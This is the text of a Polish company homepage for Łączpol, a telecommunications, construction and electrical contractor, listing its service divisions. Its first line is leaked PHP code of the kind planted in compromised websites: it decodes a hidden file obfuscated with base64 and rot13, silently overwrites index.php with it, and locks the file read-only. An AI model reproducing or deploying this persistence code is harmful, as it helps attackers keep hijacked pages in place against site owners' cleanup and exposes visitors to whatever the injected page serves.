$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Łączpol – Ekspert łączenia technologii

Usługi

Budownictwo

Firma “ŁĄCZPOL” specjalizuje się między innymi w realizacji prac budowlano – montażowych. Początek naszych działań w branży budowlanej datuje się na rok 1997. Od tego czasu wykonujemy prace budowlano–montażowe na terenie Unii Europejskiej.
(więcej…)

Dział projektowy w Bydgoszczy

Oddział w Bydgoszczy przy współpracy z Alcatel-Lucent to nasza mocna strona w bussinesie.
(więcej…)

PCPD

Profesjonalne Data Center zlokalizowane na terenie Gdańskiego Parku Naukowo – Technologicznego, ul. Trzy Lipy 3 – Gdańsk
(więcej…)

Dział projektowy

Kompleksowo zajmujemy się pracami w dziedzinie teletechniki.
(więcej…)

Komutacja i teletransmisja

Dział komutacji i teletransmisji specjalizuje się w:
(więcej…)

Dział radiowy

Obecnie wykonujemy instalacje sprzętu radiowego dla operatora komórkowego E-plus na terenie Niemiec.
(więcej…)

Energetyka i elektryka

Firma Łączpol specjalizuje się w nastepujących pracach energetycznych i elektrycznych:
(więcej…)

Teletechnika

Firma Łączpol specjalizuje się w następujących pracach teletechnicznych
(więcej…)